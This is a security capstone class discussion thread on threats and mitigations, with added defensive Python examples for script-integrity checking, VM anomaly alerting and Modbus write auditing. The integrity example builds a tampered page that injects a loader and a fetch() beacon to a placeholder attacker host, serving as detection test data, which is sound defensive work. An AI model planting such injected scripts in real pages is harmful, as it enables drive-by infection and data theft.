During this last week of Discussion Questions, I would ask that you reflect on at least one of the following:
- Which security threats did you become aware of during this capstone class? How would you mitigate against this threat?
- What mitigation methods did you become aware of for the first time during this capstone class? Why is that mitigation method unique, more efficient or effective, or otherwise significant?
Dima Dabbas says
Which security threats did you become aware of during this capstone class? How would you mitigate against this threat?
I think one of the security threats that I became more aware of from this class is the disposal of old hardware. I wasn’t aware of how complex this process is and how there really isn’t any guarantee to ensure that all the data has been wiped out for good from the hard drives. It seems like the only way to be safe that the hard drives do not contain any confidential data is to destroy the hard drives. The idea of role access and the least privilege principle is a topic I was aware of, but I think this class expanded more on the significance of role access and how it can impact the security of an organization. During this class, we learned the concepts of separation of duties, having employees learn each other’s duties and switch from time to time. This helps for auditing purposes as well as ensuring there are backups in case an employee is on vacation or out sick.
What mitigation methods did you become aware of for the first time during this capstone class? Why is that mitigation method unique, more efficient or effective, or otherwise significant?
The various policies that exist within an organization help mitigate the cyber risks and threats. The regulatory policies that exist help an organization protect its data and be compliant with the regulations. All the policies within an organization should be reviewed regularly and tested to ensure that all the vulnerabilities and threats are controlled to an acceptable level. The BCP and DRP plans are also mitigation methods as they help an organization resume its business operations in a reasonable time period. All the plans within an organization need to be updated after major updates and patches which will help in ensuring that all risks and threats are mitigated.
Elizabeth V Calise says
Dima – I am with you on that. Until I looked at some documents that explained the process of disposing of hardware, I did not realize how in-depth the process was, especially if it contained sensitive/classified data. As you mentioned, it is not 100% guaranteed that the hard drive is cleaned of any and all data. The safest method when it comes to a hard drive that has classified or sensitive data is to destroy it.
Jonathan Duani says
Dima,
I definitely agree with what you and Elizabeth have to say. It is crazy to think how extensive the decommissioning of storage media can be. You don’t think that after you delete something it is still there, but in reality a lot of the time all the data is completely recoverable. It really goes to show it is a good idea to take a couple of extra steps to be sure problems don’t arise after the fact.
Brock Donnelly says
Drive-by attacks are a threat that I am now aware of due to this capstone class. While I was mildly aware of their possibilities, this class lifted the veil on drive-by attacks. A drive-by attack is a way of distributing malware to unsuspecting victims through insecure websites. Attackers plant malicious scripts into PHP or HTTP pages. Visitors to these pages then silently become infected, assuming their computers are vulnerable to said malware.
This threat is most interesting to me because it is so devious. Modifying the code of a website is only the first step on the hackers’ agenda. Infecting the user’s machine isn’t even the end goal. The attacker hopes to gain control of a computer on the network of a much higher profile target. Besides people, data is an organization’s most valuable asset. An organization such as a financial institution, an establishment holding PII, or any proprietary data is what this hacker seeks. Following the attack would likely be ransoms or the sale of important data.
Mitigations for such a threat are multifaceted. Securing websites with high enough traffic to be a target should be the concern of every developer. Simply using best practices or free scanning tools should be second only to system patching. All consumers should patch their systems and have updated malware definitions. Organizations should have their user terminals patched and protected from malware. IDSs and IPSs, as well as firewalls, should be in place. Sufficient policies and procedures should be in place to ensure personnel and system privileges are separated with complexity so that a singular compromise does not result in a single point of failure.
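One defensive control that fits the point above about attackers planting scripts into a site's pages is integrity monitoring of the site itself: record which script tags a known-good copy of a page carries, then alert when a later copy carries any script that was not in that baseline. The Python below is an added example, not code from this thread or from any project it mentions. The two HTML pages and the `attacker-placeholder.invalid` hostname are constructed for the example, and the baseline-comparison design is an assumption about one way to implement the check.

```python
"""Flag script tags on a web page that are absent from a known-good baseline.

Added example (not from the original discussion). The HTML pages below are
constructed for illustration; "attacker-placeholder.invalid" is a placeholder host.
"""
import hashlib
from html.parser import HTMLParser


class ScriptCollector(HTMLParser):
    """Collect external script sources and SHA-256 hashes of inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []        # values of src="" on <script> tags
        self.inline_hashes = []   # sha256 of each inline <script> body
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data, possibly in chunks.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            body = "".join(self._buf).strip().encode("utf-8")
            self.inline_hashes.append(hashlib.sha256(body).hexdigest())
            self._in_script = False


def collect_scripts(html):
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser


def build_baseline(known_good_html):
    """Record the scripts a page is supposed to carry, taken from a clean copy."""
    found = collect_scripts(known_good_html)
    return {"external": set(found.external), "inline": set(found.inline_hashes)}


def find_unexpected_scripts(html, baseline):
    """Return ("external", src) / ("inline", sha256) pairs not present in the baseline."""
    found = collect_scripts(html)
    findings = [("external", s) for s in found.external if s not in baseline["external"]]
    findings += [("inline", h) for h in found.inline_hashes if h not in baseline["inline"]]
    return findings


# Constructed sample: the page as the site deployed it ...
GOOD_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script>window.appConfig = {theme: "light"};</script>
</head><body><h1>Welcome</h1></body></html>"""

# ... and the same page carrying two scripts it never shipped with.
TAMPERED_PAGE = GOOD_PAGE.replace(
    "</body>",
    '<script src="https://attacker-placeholder.invalid/loader.js"></script>\n'
    '<script>fetch("https://attacker-placeholder.invalid/beacon");</script>\n</body>',
)

if __name__ == "__main__":
    baseline = build_baseline(GOOD_PAGE)
    for kind, value in find_unexpected_scripts(TAMPERED_PAGE, baseline):
        print(f"unexpected {kind} script: {value}")
```

Hashing inline bodies rather than storing them keeps the baseline small and makes the comparison exact; in practice the baseline is rebuilt on every legitimate deploy and the check runs on a schedule against the live site.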
Dima Dabbas says
Brock,
Drive-by attacks are indeed very sneaky attacks; as you mentioned, victims of these attacks aren’t even aware that their computers have been infected by malware. It is only slowly, after noticing abnormal behavior, that they realize their computers have been infected by malware. There is no truly easy way to protect against these types of attacks besides ensuring that the systems are always patched and that the systems are protected from the most recent malware.
Jonathan Duani says
I think the reason that drive-by attacks are so bad is that it takes so much work to set up and it’s so premeditated, in that there are so many different levels to it, like you mentioned, where not only is the point to infect but also to gain control at some point. It really does make this attack so bad when it happens.
Ahmed A. Alkaysi says
What mitigation methods did you become aware of for the first time during this capstone class? Why is that mitigation method unique, more efficient or effective, or otherwise significant?
I wasn’t really aware of deterrent or recovery controls before this class. I always knew the big three: preventive, corrective, and detective. I think that although deterrent controls might not require a ton of investment, they can be pretty efficient at deterring potential threats. For example, let’s say you are speeding down a road and see a sign saying there are speed cameras in the area; you would most likely start slowing down and driving around the speed limit. With just the cost of the sign itself, assuming that there are indeed no speed cameras, a control was implemented to reduce speeding drivers. Deterrent controls can also be used for physical security. Instead of using real cameras everywhere, an organization can employ dud cameras displayed in obvious locations to deter a potential bad actor from committing crimes.
Oby Okereke says
Hi Ahmed,
And you are absolutely right, the use of dud cameras is quite common in many organizations. Though many claims exist to support their claim to deter crime, empirical evidence does not prove the same for the most part. A determined burglar or potential perpetrator will still commit crime, but for an everyday employee… they may have to think twice, not knowing exactly if they are being taped.
Dima Dabbas says
Ahmed,
I had heard of deterrent controls before but did not actually know what they were. This class made me understand what these controls are and what impact they can have on organizations. As you mentioned, deterrent controls are important as they may make attackers think twice before they commit their crime. Your example explains that clearly and signifies why organizations should consider deterrent controls.
Frederic D Rohrer says
Which security threats did you become aware of during this capstone class? How would you mitigate against this threat?
I became aware of many of the physical security threats during this class. I did not consider physical security an important domain in the CISSP framework before. However, now I see that physical security is the first step to a complete cyber security program. Facilities, data centers and servers are the most essential to protect; without these there would be no application or database to hack into. Physical weaknesses are just as plentiful and easy to abuse as digital ones. I know now that mitigation of these threats can be as easy as picking the right location for your facility. Also, having biometric scanning devices and man-traps at doors did not occur to me, at least not in the context of data center security. I watched numerous presentations about physical security outside of class which gave me some insight into how easy it is to “hack” elevators, doors, card readers and locks. Just being aware of the fallacies of all these can aid in a secure data center design.
What mitigation methods did you become aware of for the first time during this capstone class? Why is that mitigation method unique, more efficient or effective, or otherwise significant?
I find the idea of job rotation a very interesting one. In Domain 7 – Security Operations, we discussed the fact that employees can be malicious or incompetent and it will never be found out because they always perform the same task. This can be mitigated by rotating the person out of their role during a job-critical task, in order to see whether the action is performed normally or if there are discrepancies.
Oby Okereke says
Hi Fred:
I have to chime in on your comment regarding physical security threats. Over time, I’ve come to know the importance of securing a business premises for fraud prevention and theft for the most part, but taking this capstone class has opened my mind’s eye to a lot more.
I particularly came to learn about CPTED – crime prevention through environmental design. I heard that term for the first time during this capstone class.
Having waded through a series of articles in the course of the capstone class, it all makes sense why a poorly designed business environment is not only a threat and danger to the individuals or employees who report to the business on a daily basis, but also why the survival of the business hinges greatly on CPTED in case of an occurrence of a natural disaster or even a hostage situation.
The protection of resources and people is all so important for business continuity, and as a security professional, I would think and expect this to be at the forefront of every business continuity strategy and planning.
Elizabeth V Calise says
Fred – physical security is definitely something all should take seriously and it should be a priority. I can say I recently learned this a couple of months ago after talking to a few colleagues. You mentioned even picking the location is important. When you think about US companies going international, they have to pick their locations wisely, especially company contractors. It is a lengthy process just to find the right location and see if it checks all the required boxes. You have to include politics as well. A US government contractor who is looking for a location in Denmark is not going to choose a building that is right next to a sensitive Russian-based company. There is so much that goes into the physical aspect.
Jonathan Duani says
Fred,
It is a really good point and I do agree with you; I did not think physical security was part of an IT security course, but it does make sense. There is a whole different level to physical security because not only are there threats in the cyber realm where people try to gain access remotely, but there are also threats to the physical hardware that everything is running on. This makes the need to have controls in place to physically lock down the locations of servers so important.
Oby Okereke says
Which security threats did you become aware of during this capstone class? How would you mitigate against this threat?
A VM escape attack is one of the many security threats that I learned of during the capstone class. The trend to migrate to the cloud and the use of hypervisors in the cloud makes this attack even more dangerous because of the blurred responsibility lines associated with cloud service providers (CSPs) and their customers.
I had to research a bit on this topic and even learned of specific vulnerabilities that have been successful on VMs – various CVEs exist that describe these vulnerabilities, and below are some of the mitigating controls that I would adopt to address VM escape attacks.
1. Discovery and inventory management – This will help to avoid VMs being neglected, and this ties into the next point, which is heavy monitoring.
2. Heavy monitoring – By monitoring the VM environments, any change in traffic or baseline use will trigger alerts for further investigation, thereby catching any suspicious attacks or movements.
3. Sandboxing – Sandboxing VMs is a particularly good mitigating control that allows isolation to occur when testing applications before a full roll-out occurs.
4. Advising customers to lean towards a private cloud where the sensitivity of data is very important.
5. Practicing defense in depth is the be-all mitigating control which will, in essence, create different layers of protective mechanisms that will make it difficult for attackers to fully succeed in VM escapes, as they will have to navigate many hoops in order to be successful.
On a final note, good patch management, configuration, and change control management practices are equally mitigating controls that one should not neglect.
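Points 1 and 2 in the list above (inventory management and baseline monitoring) can be demonstrated together in a few lines: learn each VM's normal resource use from a training window, then alert both on samples that deviate sharply from that baseline and on any VM that reports telemetry without being in the inventory. The Python below is an added example, not code from this thread or from any cloud provider's tooling. The telemetry rows, VM names and the 3-standard-deviation threshold are constructed assumptions for illustration.

```python
"""Baseline-deviation alerting for VM telemetry, tied to an inventory of known VMs.

Added example (not from the original discussion). All telemetry rows below are
constructed; the metrics and threshold are illustrative choices, not a standard.
"""
import statistics
from collections import defaultdict

# Each sample: (vm_id, hour, egress_mb, cpu_pct). Constructed, not real telemetry.
BASELINE_WINDOW = [
    ("web-01", 0, 120, 22), ("web-01", 1, 131, 25), ("web-01", 2, 118, 20),
    ("web-01", 3, 125, 24), ("web-01", 4, 127, 23), ("web-01", 5, 122, 21),
    ("web-01", 6, 130, 26), ("web-01", 7, 119, 22),
]
INVENTORY = {"web-01"}            # VMs that discovery/inventory management knows about
LIVE_SAMPLES = [
    ("web-01", 8, 126, 24),        # an ordinary hour
    ("web-01", 9, 640, 91),        # sudden jump in egress traffic and CPU
    ("tmp-build-7", 9, 15, 5),     # a VM nobody inventoried
]
METRICS = ("egress_mb", "cpu_pct")


def build_baselines(samples):
    """Per-VM mean and sample standard deviation of each metric over the training window."""
    by_vm = defaultdict(lambda: defaultdict(list))
    for vm, _hour, egress, cpu in samples:
        by_vm[vm]["egress_mb"].append(egress)
        by_vm[vm]["cpu_pct"].append(cpu)
    baselines = {}
    for vm, series in by_vm.items():
        baselines[vm] = {}
        for metric, values in series.items():
            stdev = statistics.stdev(values) if len(values) > 1 else 0.0
            baselines[vm][metric] = (statistics.mean(values), stdev)
    return baselines


def flag_anomalies(samples, baselines, inventory, k=3.0):
    """Return (vm, hour, reason, value) tuples.

    reason is a metric name when the sample exceeds mean + k * stdev for that VM,
    "not_in_inventory" when the VM is unknown, or "no_baseline" when it is
    inventoried but was never observed during the training window.
    """
    findings = []
    for vm, hour, egress, cpu in samples:
        if vm not in inventory:
            findings.append((vm, hour, "not_in_inventory", None))
            continue
        if vm not in baselines:
            findings.append((vm, hour, "no_baseline", None))
            continue
        for metric, value in zip(METRICS, (egress, cpu)):
            mean, stdev = baselines[vm][metric]
            # A perfectly flat baseline (stdev 0) makes any increase a deviation.
            threshold = mean + k * stdev
            if value > threshold:
                findings.append((vm, hour, metric, value))
    return findings


if __name__ == "__main__":
    for finding in flag_anomalies(LIVE_SAMPLES, build_baselines(BASELINE_WINDOW), INVENTORY):
        print(finding)
```

The "not_in_inventory" finding is the part that ties monitoring back to discovery: a VM that shows up in telemetry but not in the asset list is exactly the neglected machine the first control is meant to catch.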
Duy Nguyen says
1. Which security threats did you become aware of during this capstone class? How would you mitigate against this threat?
2. What mitigation methods did you become aware of for the first time during this capstone class? Why is that mitigation method unique, more efficient or effective, or otherwise significant?
Based on our previous security classes, a lot of the main vulnerabilities and threats were cemented into our heads. One aspect that I had the opportunity of learning more about was the current incorporation of security into older lifecycle methodologies. As more and more breaches are reported, many organizations are slowly incorporating the security aspect into each level of their Software Development Lifecycle. This process is set up by adding security-related activities to the development process. There are various methodologies that have attempted to incorporate these activities such as MS Security Development Lifecycle (MS SDLC), NIST 800-64, and OWASP CLASP (Comprehensive, Lightweight Application Security Process).
Dima Dabbas says
Duy,
This class does highlight the importance of considering security in every phase of any project. In order to ensure that a new project incorporates security, it is essential to consider security from the beginning, from the planning phase. This helps avoid having to spend more money when things start to go wrong and you notice that the system was not well protected. In many of those cases, the system would need to be rebuilt, which ends up costing the organization more personnel and financial resources.
Jonathan Duani says
I think one of the biggest security threats that I became aware of during class was crypto-physic hacking. This is when physical infrastructure is hacked for malicious purposes, for example a power grid or water treatment plant. I think this is really interesting because as people get better and better at hacking, the space could change to fighting a cyber war instead of a physical war. And it is already happening. I think as time progresses we will see more and more wars fought from home by attacking critical infrastructure instead of boots on the ground. I think the best way to protect our infrastructure from such attacks would be, first things first, to make sure all updates have been completed. All systems and endpoints should be properly secured, with correct physical security as well. It is important to make sure all the systems are actively monitored in the event of something happening. Finally, if all else fails, for example if it’s a super critical system on a legacy piece of software that cannot be updated, I think the best course of action is to air gap the system and make sure nothing can get to it unless you are physically sitting at the console.
Elizabeth V Calise says
1. Which security threats did you become aware of during this capstone class? How would you mitigate against this threat?
I came across this security threat that I was not fully aware of during one of the community site discussions, and that would be mobile malware. Mobile devices are increasingly a top attack target. It is a trend rooted in poor vulnerability management. Many organizations that try to deploy mobile device management solutions find privacy concerns limit adoption. A pain point that has been identified is the Android installed base. It has been shown that a vast majority of Android devices in the world are running on old versions of Android. So when you look at the motivations of a lot of IoT device manufacturers, it is challenging to get them to continue to support devices and get timely patches, because then you are getting back to mobile issues.
To help mitigate against this threat, organizations should ensure employees have access to an anti-malware solution. Even if it is not managed by the organization, this will alleviate some security concerns.
Jonathan Duani says
Elizabeth,
Mobile malware is a really good one! I think it is becoming more and more known as the years go by, and especially on Android phones they are super annoying. A cell phone is basically a tiny computer at this point and people are starting to target them. It’s crazy to think how much of your life is in your mobile device, and if someone can gain access it is essentially just as bad or worse than gaining access to your computer. There is a good chance you have more personal information on your phone at this point.
Steve Pote says
…I posted these backwards…this is my ~news~…still works this way
From the NJ Cyber newsletter there is a cryptic warning and a report on IoT being used as a pivot and, in the case of cameras, devices being taken over and spoofed (imagine every bank robbery movie ever where they play the video of the empty vault while it is being robbed).
For anyone interested, I have a PoC of both using SEPTA Rail in a class presentation from last Fall…
In most cases there is no good path for what to do next. Webcams ship with and are used with bad default passwords. They serve data using old, unsecured (let alone encrypted) connections, and for now we are in the “happy it works” phase… OK, it’s alive… What now, Dr. Frankenstein?
More bad things will need to happen before secure transmissions and modest authentications and any form of secure coding are in place in IoT.
http://view.communications.cyber.nj.gov/?qs=aa5d4701c973ba8b484a55458c9a73612ff29e0a2394a64911ec90b5419980d5b1bee52bce94ccde7b7c3cd25149420297d8dad713d40c041e5613c69879ec4c64add076c9f98a69d1b24fcb409cd1f3
Sheena L. Thomas says
I have been in the industry for a few years now, so most of the threats discussed I am familiar with. However, I am amazed at how the same threats that affected us years ago still exist today. Technology and the industry are forever changing, but most of the threats are still the same. Sometimes it feels as if the attackers are one step ahead, but then again, are we shooting ourselves in the foot by not doing our due diligence as a company? As I grow in this field I am looking forward to constantly having to defend the data and privacy of end users.
I wish everyone the best as they grow in their careers!
Congratulations to all of the 2019 ITACS graduates!!!! We made it!!!
Jonathan Reid Kerr says
Which security threats did you become aware of during this capstone class? How would you mitigate against this threat?
There was one security threat that I came across during my research for our group project, namely the threat that current power utility communication protocols (DNP3/Modbus/IEC) pose to power utility facilities and businesses. The lack of authentication and integrity checking can allow anyone who gains access to spoof alerts and messages, and even redirect traffic easily over the network.
One of the major issues is that Industrial Control System (ICS) security is a specialized field with few security professionals in it. This has slowed development of technologies to make up for the weaknesses in their communication protocols and has left many organizations without the expertise to defend against cyber attacks. In order to mitigate this threat, power utility companies should conduct a vulnerability analysis to assess and shut down various points of entry for an attacker. Access points should be limited and employees should undergo security awareness training/education. This will help with preventing exploitation of the protocols being used by keeping attackers out of the network. It is a small bandage on a much larger problem, one that needs far more time and effort before it can be fixed.
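Because Modbus/TCP carries no authentication, the protocol itself cannot tell a legitimate write from a spoofed one; the compensating control described above (limiting access points) is usually enforced on the network by deciding which hosts may issue write commands to a controller and alerting on writes from anyone else. The Python below is an added example, not code from this thread or from any vendor's product. It parses the public Modbus/TCP framing (a 7-byte MBAP header followed by a one-byte function code) and audits a constructed list of (source IP, frame) events against an allowlist; the IP addresses, frames and allowlist are all constructed for the example.

```python
"""Parse Modbus/TCP frames and flag write commands from hosts not allowed to issue them.

Added example (not from the original discussion). Frames, addresses and the allowlist
are constructed. Modbus/TCP framing: MBAP header = transaction id (2 bytes), protocol id
(2 bytes, always 0), length (2 bytes, count of bytes that follow), unit id (1 byte);
then the PDU, whose first byte is the function code.
"""
import struct

# Function codes that change controller state (from the public Modbus function code list).
WRITE_FUNCTIONS = {
    5: "write single coil",
    6: "write single register",
    15: "write multiple coils",
    16: "write multiple registers",
}


def parse_modbus_tcp(frame):
    """Split a Modbus/TCP frame into its fields, raising ValueError if it is malformed."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError(f"unexpected protocol id {proto}")
    if length != len(frame) - 6:
        raise ValueError(f"length field {length} disagrees with frame size {len(frame) - 6}")
    return {"tid": tid, "unit": unit, "func": frame[7], "data": frame[8:]}


def audit(events, allowed_writers):
    """events: iterable of (source_ip, frame_bytes).

    Returns (source_ip, reason, detail) findings: a write function code from a host
    outside allowed_writers, or a frame that does not parse (detail is None then).
    """
    findings = []
    for src, frame in events:
        try:
            pdu = parse_modbus_tcp(frame)
        except ValueError:
            findings.append((src, "malformed_frame", None))
            continue
        if pdu["func"] in WRITE_FUNCTIONS and src not in allowed_writers:
            findings.append((src, "write_from_unauthorized_host", pdu["func"]))
    return findings


# Constructed hosts: an HMI that only reads, an engineering workstation that may write,
# and an address that should never be talking to the controller at all.
HMI = "10.0.5.20"
ENGINEERING_WS = "10.0.5.10"
UNKNOWN = "10.0.9.77"
ALLOWED_WRITERS = {ENGINEERING_WS}

EVENTS = [
    (HMI, bytes.fromhex("00010000000601030000000a")),             # read 10 holding registers
    (UNKNOWN, bytes.fromhex("0002000000060106001000ff")),         # write single register 0x10
    (ENGINEERING_WS, bytes.fromhex("000300000009011000100001020100")),  # write 1 register
    (UNKNOWN, bytes.fromhex("000400000010010300000001")),         # length field says 16, frame has 6
]

if __name__ == "__main__":
    for finding in audit(EVENTS, ALLOWED_WRITERS):
        print(finding)
```

The allowlist is the control: nothing in the frame proves who sent it, so the decision rests on the network position of the sender, which is why segmenting the control network and limiting which hosts can reach the PLCs matters more here than it does for protocols that authenticate their peers. Malformed frames are reported separately because a length field that disagrees with the packet is a common sign of a scanner or a broken client rather than a real HMI.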